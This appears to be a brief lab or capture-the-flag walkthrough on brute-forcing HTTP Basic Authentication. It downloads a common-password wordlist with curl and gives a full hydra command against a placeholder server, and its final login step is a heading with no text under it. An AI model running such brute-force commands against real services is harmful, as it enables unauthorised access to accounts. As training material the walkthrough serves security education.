Basic Authentication

After successfully brute-forcing, and then logging into the target, what is the full flag you find?

Getting the flag:

Step 1 - Download a password wordlist:

curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt

Step 2 - Execute the command:

hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt SERVER_IP http-get / -s SERVER_PORT

Step 3 - Login into the application:

Last updated 5 months ago